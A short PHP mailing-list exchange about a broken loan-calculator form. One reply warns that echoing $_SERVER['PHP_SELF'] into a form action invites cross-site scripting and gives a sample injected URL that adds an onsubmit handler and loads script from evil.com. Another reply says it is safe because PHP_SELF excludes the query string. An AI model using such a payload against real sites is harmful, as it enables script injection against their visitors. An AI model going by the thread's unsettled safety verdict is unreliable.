Jochem Maas wrote:
Apparently it's not going to work. PHP_SELF does not include query
string. So it is safe to use it this way.
Op 3/10/10 6:23 PM, Joseph Thayne schreef:
Looks to me like you are closing your form before you put anything in
it. Therefore, the loan_amount is not set making the value 0. Follow
the math, and you are dividing by 1-1.
Change this line:
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post"></form>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
this is a XSS waiting to happen. I can put something like the following in
the request uri:
index.php?" onsubmit="evil()"><script src="http://www.evil.com/evi.js"></script>
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php